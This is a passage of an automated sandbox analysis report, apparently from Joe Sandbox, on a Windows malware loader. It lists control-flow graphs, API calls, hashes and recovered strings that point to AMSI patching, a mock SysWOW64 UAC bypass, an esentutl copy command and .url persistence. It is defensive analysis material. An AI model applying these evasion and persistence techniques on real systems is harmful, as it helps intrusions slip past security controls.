10337->10344 10354 2e8a507-2e8a50e call 2e789d0 10344->10354 10361 2e8a513-2e8a9ad call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 * 5 10354->10361 10663 2e8a9b2-2e8aa07 call 2e789d0 * 6 10361->10663 10517 2e87055-2e8706c call 2e63700 10512->10517 10586->8994 10675 2e8aa0c-2e8aa16 call 2e789d0 10663->10675 10677 2e8aa1b-2e8aa43 call 2e789d0 * 3 10675->10677 10683 2e8aa48-2e8ae01 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 10677->10683 10793 2e8ae06-2e8ae0d call 2e789d0 10683->10793 10795 2e8ae12-2e8ae34 call 2e646d4 * 2 10793->10795 10799 2e8ae39-2e8ae40 call 2e789d0 10795->10799 10801 2e8ae45-2e8ae67 call 2e646d4 * 2 10799->10801 10805 2e8ae6c-2e8ae73 call 2e789d0 10801->10805 10807 2e8ae78-2e8ae9a call 2e646d4 * 2 10805->10807 10811 2e8ae9f-2e8aea6 call 2e789d0 10807->10811 10813 2e8aeab-2e8b2f3 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e646d4 * 2 call 2e789d0 call 2e77c10 call 2e78338 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 10811->10813 10943 2e8b2f8-2e8b2fa ExitProcess 10813->10943
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E789D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02EE738C,Function_0000662C,00000004,02EE739C,02EE738C,05F5E103,00000040,02EE73A0,74B10000,00000000,00000000), ref: 02E78AAA
                                                                                                                    • Part of subcall function 02E7DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E7DD5E), ref: 02E7DCCB
                                                                                                                    • Part of subcall function 02E7DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02E7DD05
                                                                                                                    • Part of subcall function 02E7DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02E7DD32
                                                                                                                    • Part of subcall function 02E7DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02E7DD3B
                                                                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,02E8BB30,00000000,00000000,02E8BB24,00000000,00000000), ref: 02E840CB
                                                                                                                    • Part of subcall function 02E788B8: LoadLibraryW.KERNEL32(amsi), ref: 02E788C1
                                                                                                                    • Part of subcall function 02E788B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02E78920
                                                                                                                  • Sleep.KERNEL32(000003E8,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,000003E8,ScanBuffer,02EE7380,02E8B7B8,UacScan,02EE7380), ref: 02E84277
                                                                                                                    • Part of subcall function 02E7894C: LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize,02EE73A8,02E7A93C,UacScan), ref: 02E78960
                                                                                                                    • Part of subcall function 02E7894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E7897A
                                                                                                                    • Part of subcall function 02E7894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize), ref: 02E789B6
                                                                                                                  • Sleep.KERNEL32(00004E20,UacScan,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,ScanBuffer,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,UacInitialize,02EE7380,02E8B7B8), ref: 02E850EE
                                                                                                                    • Part of subcall function 02E7DC04: RtlI.N(?,?,00000000,02E7DC7E), ref: 02E7DC2C
                                                                                                                    • Part of subcall function 02E7DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02E7DC7E), ref: 02E7DC42
                                                                                                                    • Part of subcall function 02E7DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02E7DC7E), ref: 02E7DC61
                                                                                                                    • Part of subcall function 02E67E5C: GetFileAttributesA.KERNEL32(00000000,?,02E8041F,ScanString,02EE7380,02E8B7B8,OpenSession,02EE7380,02E8B7B8,ScanString,02EE7380,02E8B7B8,UacScan,02EE7380,02E8B7B8,UacInitialize), ref: 02E67E67
                                                                                                                    • Part of subcall function 02E785BC: WinExec.KERNEL32(?,?), ref: 02E78624
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                  • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                  • API String ID: 2171786310-3926298568
                                                                                                                  • Opcode ID: a9e34e86894794647165ff7120072a2f213f4cee8a58be1f79ea22c5ead93e70
                                                                                                                  • Instruction ID: 3de22712990a58cc1214f0f199a25bf538df1717185f47e8ed0b9e2a1e87d348
                                                                                                                  • Opcode Fuzzy Hash: a9e34e86894794647165ff7120072a2f213f4cee8a58be1f79ea22c5ead93e70
                                                                                                                  • Instruction Fuzzy Hash: F4430C34AC015D8BDB20FB64DC84AAE73B6FB85344F50D1A6B44DAB294DB70AE81CF51

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 10970 2e7e678-2e7e67c 10971 2e7e681-2e7e686 10970->10971 10971->10971 10972 2e7e688-2e7ec81 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64740 * 2 call 2e64860 call 2e64778 call 2e630d4 call 2e646d4 * 2 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64740 call 2e67f2c call 2e649a0 call 2e64d74 call 2e64df0 call 2e64740 call 2e649a0 call 2e64d74 call 2e64df0 call 2e78788 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c 10971->10972 11175 2e7ec87-2e7eedd call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 call 2e64860 call 2e649a0 call 2e646d4 call 2e647ec call 2e649a0 call 2e646d4 call 2e789d0 WaitForSingleObject CloseHandle * 2 call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c call 2e64860 call 2e649a0 call 2e647ec call 2e649a0 call 2e7894c * 3 10972->11175 11176 2e7eee2-2e7ef2f call 2e64500 call 2e64c60 call 2e64500 call 2e64c60 call 2e64500 10972->11176 11175->11176
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E789D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02EE738C,Function_0000662C,00000004,02EE739C,02EE738C,05F5E103,00000040,02EE73A0,74B10000,00000000,00000000), ref: 02E78AAA
                                                                                                                    • Part of subcall function 02E78788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E78814
                                                                                                                    • Part of subcall function 02E7894C: LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize,02EE73A8,02E7A93C,UacScan), ref: 02E78960
                                                                                                                    • Part of subcall function 02E7894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E7897A
                                                                                                                    • Part of subcall function 02E7894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,02EE73A8,02E7A587,ScanString,02EE73A8,02E7A93C,ScanBuffer,02EE73A8,02E7A93C,Initialize), ref: 02E789B6
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02EE7380,02E7EF4C,OpenSession,02EE7380,02E7EF4C,UacScan,02EE7380,02E7EF4C,ScanBuffer,02EE7380,02E7EF4C,OpenSession,02EE7380), ref: 02E7ED6E
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02EE7380,02E7EF4C,OpenSession,02EE7380,02E7EF4C,UacScan,02EE7380,02E7EF4C,ScanBuffer,02EE7380,02E7EF4C,OpenSession), ref: 02E7ED76
                                                                                                                  • CloseHandle.KERNEL32(0000052C,00000000,00000000,000000FF,ScanString,02EE7380,02E7EF4C,OpenSession,02EE7380,02E7EF4C,UacScan,02EE7380,02E7EF4C,ScanBuffer,02EE7380,02E7EF4C), ref: 02E7ED7F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                  • String ID: )"C:\Users\Public\Libraries\lxsyrsiW.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                  • API String ID: 3475578485-1053911981
                                                                                                                  • Opcode ID: cec04f9bb86ccbd3a1ed3edccd2fad6544d39d62e1d0521f5d427ee734439db0
                                                                                                                  • Instruction ID: 5190c07c39ce277a59a60d45c4315246a055f8deff8fe81bfedeacc9e0c5a472
                                                                                                                  • Opcode Fuzzy Hash: cec04f9bb86ccbd3a1ed3edccd2fad6544d39d62e1d0521f5d427ee734439db0
                                                                                                                  • Instruction Fuzzy Hash: D2221334AC015D9BEB25FB64D885B9E73B6AF86340F14E0E1B008EB694DB70AE41CF55

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 13139 2e61724-2e61736 13140 2e6173c-2e6174c 13139->13140 13141 2e61968-2e6196d 13139->13141 13142 2e617a4-2e617ad 13140->13142 13143 2e6174e-2e6175b 13140->13143 13144 2e61973-2e61984 13141->13144 13145 2e61a80-2e61a83 13141->13145 13142->13143 13152 2e617af-2e617bb 13142->13152 13148 2e61774-2e61780 13143->13148 13149 2e6175d-2e6176a 13143->13149 13150 2e61986-2e619a2 13144->13150 13151 2e61938-2e61945 13144->13151 13146 2e61684-2e616ad VirtualAlloc 13145->13146 13147 2e61a89-2e61a8b 13145->13147 13153 2e616df-2e616e5 13146->13153 13154 2e616af-2e616dc call 2e61644 13146->13154 13158 2e61782-2e61790 13148->13158 13159 2e617f0-2e617f9 13148->13159 13155 2e61794-2e617a1 13149->13155 13156 2e6176c-2e61770 13149->13156 13160 2e619a4-2e619ac 13150->13160 13161 2e619b0-2e619bf 13150->13161 13151->13150 13157 2e61947-2e6195b Sleep 13151->13157 13152->13143 13162 2e617bd-2e617c9 13152->13162 13154->13153 13157->13150 13169 2e6195d-2e61964 Sleep 13157->13169 13167 2e6182c-2e61836 13159->13167 13168 2e617fb-2e61808 13159->13168 13170 2e61a0c-2e61a22 13160->13170 13163 2e619c1-2e619d5 13161->13163 13164 2e619d8-2e619e0 13161->13164 13162->13143 13165 2e617cb-2e617de Sleep 13162->13165 13163->13170 13172 2e619e2-2e619fa 13164->13172 13173 2e619fc-2e619fe call 2e615cc 13164->13173 13165->13143 13171 2e617e4-2e617eb Sleep 13165->13171 13176 2e618a8-2e618b4 13167->13176 13177 2e61838-2e61863 13167->13177 13168->13167 13175 2e6180a-2e6181e Sleep 13168->13175 13169->13151 13178 2e61a24-2e61a32 13170->13178 13179 2e61a3b-2e61a47 13170->13179 13171->13142 13180 2e61a03-2e61a0b 13172->13180 13173->13180 13175->13167 13182 2e61820-2e61827 Sleep 13175->13182 13188 2e618b6-2e618c8 13176->13188 13189 2e618dc-2e618eb call 2e615cc 13176->13189 13183 2e61865-2e61873 13177->13183 13184 2e6187c-2e6188a 13177->13184 13178->13179 13185 2e61a34 13178->13185 13186 2e61a68 13179->13186 13187 2e61a49-2e61a5c 13179->13187 13182->13168 13183->13184 13193 2e61875 13183->13193 13194 2e6188c-2e618a6 call 2e61500 13184->13194 13195 2e618f8 13184->13195 13185->13179 13197 2e61a6d-2e61a7f 13186->13197 13196 2e61a5e-2e61a63 call 2e61500 13187->13196 13187->13197 13190 2e618cc-2e618da 13188->13190 13191 2e618ca 13188->13191 13198 2e618fd-2e61936 13189->13198 13202 2e618ed-2e618f7 13189->13202 13190->13198 13191->13190 13193->13184 13194->13198 13195->13198 13196->13197
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000), ref: 02E617D0
                                                                                                                  • Sleep.KERNEL32(0000000A,00000000), ref: 02E617E6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 5696ea8c00b72aa2f039e17a97b572c652d6e342860ec6db9d537f3580e7e291
                                                                                                                  • Instruction ID: 135a629cc4d8985b340a3bb671702d5f8ba14b1785a1b4b441b40e9204f5785a
                                                                                                                  • Opcode Fuzzy Hash: 5696ea8c00b72aa2f039e17a97b572c652d6e342860ec6db9d537f3580e7e291
                                                                                                                  • Instruction Fuzzy Hash: ADB124B2AC02508FCB16CF69D488365BBE1EB86399F19D6ADE44D8F3C5C7709491CB90

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • LoadLibraryW.KERNEL32(amsi), ref: 02E788C1
                                                                                                                    • Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9
                                                                                                                    • Part of subcall function 02E77D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E77DEC
                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02E78920
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                  • String ID: DllGetClassObject$W$amsi
                                                                                                                  • API String ID: 941070894-2671292670
                                                                                                                  • Opcode ID: 53fee759976c1c66e5e7789e105d6b78038b3b31c3c80edd043caf095a851929
                                                                                                                  • Instruction ID: 9e1dda18aa06637536486182e188e0bfb0d18b166088153fa2a90b9580f75400
                                                                                                                  • Opcode Fuzzy Hash: 53fee759976c1c66e5e7789e105d6b78038b3b31c3c80edd043caf095a851929
                                                                                                                  • Instruction Fuzzy Hash: CEF0445058C381B9E301E3748C49F4FBECD4B66264F04DA58B1E85A2D2D679D1059767

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 13227 2e61a8c-2e61a9b 13228 2e61aa1-2e61aa5 13227->13228 13229 2e61b6c-2e61b6f 13227->13229 13232 2e61aa7-2e61aae 13228->13232 13233 2e61b08-2e61b11 13228->13233 13230 2e61b75-2e61b7f 13229->13230 13231 2e61c5c-2e61c60 13229->13231 13235 2e61b81-2e61b8d 13230->13235 13236 2e61b3c-2e61b49 13230->13236 13239 2e61c66-2e61c6b 13231->13239 13240 2e616e8-2e6170b call 2e61644 VirtualFree 13231->13240 13237 2e61ab0-2e61abb 13232->13237 13238 2e61adc-2e61ade 13232->13238 13233->13232 13234 2e61b13-2e61b27 Sleep 13233->13234 13234->13232 13241 2e61b2d-2e61b38 Sleep 13234->13241 13243 2e61bc4-2e61bd2 13235->13243 13244 2e61b8f-2e61b92 13235->13244 13236->13235 13242 2e61b4b-2e61b5f Sleep 13236->13242 13245 2e61ac4-2e61ad9 13237->13245 13246 2e61abd-2e61ac2 13237->13246 13248 2e61af3 13238->13248 13249 2e61ae0-2e61af1 13238->13249 13258 2e61716 13240->13258 13259 2e6170d-2e61714 13240->13259 13241->13233 13242->13235 13252 2e61b61-2e61b68 Sleep 13242->13252 13250 2e61b96-2e61b9a 13243->13250 13251 2e61bd4-2e61bd9 call 2e614c0 13243->13251 13244->13250 13254 2e61af6-2e61b03 13248->13254 13249->13248 13249->13254 13256 2e61bdc-2e61be9 13250->13256 13257 2e61b9c-2e61ba2 13250->13257 13251->13250 13252->13236 13254->13230 13256->13257 13261 2e61beb-2e61bf2 call 2e614c0 13256->13261 13263 2e61bf4-2e61bfe 13257->13263 13264 2e61ba4-2e61bc2 call 2e61500 13257->13264 13262 2e61719-2e61723 13258->13262 13259->13262 13261->13257 13266 2e61c00-2e61c28 VirtualFree 13263->13266 13267 2e61c2c-2e61c59 call 2e61560 13263->13267
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,00000000,02E61FE4), ref: 02E61B17
                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02E61FE4), ref: 02E61B31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3472027048-0
                                                                                                                  • Opcode ID: 34e7ba96bed52c081241060124423e901482b311ed6898d429dc7ac57479b215
                                                                                                                  • Instruction ID: 547207f9516a95ca36476ed9a4ed0f954339170dc462d1cf9db416702e110bbc
                                                                                                                  • Opcode Fuzzy Hash: 34e7ba96bed52c081241060124423e901482b311ed6898d429dc7ac57479b215
                                                                                                                  • Instruction Fuzzy Hash: 9351A071AC12418FDB16CF688988776BBE4AB46398F18D5AEE44CCF3C2D7709845CB91

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02E7E5F6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CheckConnectionInternet
                                                                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                  • API String ID: 3847983778-3852638603
                                                                                                                  • Opcode ID: 137637e05dc9eaaeecb53347488837bbb24959fe2d627409edc0ad9b1900b124
                                                                                                                  • Instruction ID: e42399b162a39f0142706574a37a660c88ccddb7006f70153cf95597d9d5afc1
                                                                                                                  • Opcode Fuzzy Hash: 137637e05dc9eaaeecb53347488837bbb24959fe2d627409edc0ad9b1900b124
                                                                                                                  • Instruction Fuzzy Hash: 14412135BC01099BEB21EBA4D845EEEB3FAEF89740F60E465F041E7291DA70AD018F55
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
                                                                                                                    • Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E
                                                                                                                    • Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
                                                                                                                    • Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9
                                                                                                                  • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E78814
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
